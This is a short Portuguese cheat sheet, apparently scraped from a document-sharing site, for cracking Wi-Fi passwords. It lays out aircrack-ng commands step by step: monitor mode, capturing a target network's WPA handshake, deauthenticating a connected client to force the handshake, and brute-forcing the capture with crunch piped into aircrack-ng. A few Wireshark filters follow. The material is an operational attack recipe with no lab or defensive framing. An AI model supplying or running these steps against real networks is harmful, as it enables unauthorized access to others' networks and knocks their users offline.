Vous êtes sur la page 1sur 1

quebrar senhas dewifi combruteforce sem salvar wordlist

1- airmon-ng start wlan0

2- iwconfig

3- airodump-ng wlan0mon
#monitora as redes pr�ximas

4- copia o BSSID

5- airodump-ng --bssid MAC -w teste1 -c "canal da rede CH" wlan0m0n(gera arquivo


cap)

6- outro terminar derumbando usu�rio pelo station mac

7- aireplay-ng --deauth 0 MACcliente (STATION) -a MAC BSSID wlan0mon

8- verificar recebimento do handshake

9- testa senhas sem wordlist salva

airodump-ng para saber o MAC da rede

10 outro terminal

crunch min e max


ex: crunch 2 8 0123456789abcd |aircrack-ng -w - -b BSSID arquivo.cap

GET: http.request.method == "GET"


POST: http.request.method == "POST"

ip.src == ip or ip.dst ip

Vous aimerez peut-être aussi